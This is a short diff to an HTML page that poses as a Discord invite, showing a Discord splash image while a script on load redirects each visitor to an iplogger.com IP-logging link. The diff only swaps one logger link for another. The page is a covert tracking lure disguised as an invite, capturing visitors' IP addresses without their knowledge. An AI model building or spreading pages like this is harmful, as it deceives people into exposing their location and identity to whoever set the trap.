--- a/invite/aW52aXRl.html
+++ b/invite/aW52aXRl.html
@@ -1,2 +1,2 @@
-<script>location.href='https://iplogger.com/2LL0U5'</script>
+<script>location.href='https://iplogger.com/2qp1c4'</script>
 <img src="https://cdn.discordapp.com/discovery-splashes/916000055801024582/bb4562ac7f60473a5d8e0cd02742c43a.jpg?size=2048">
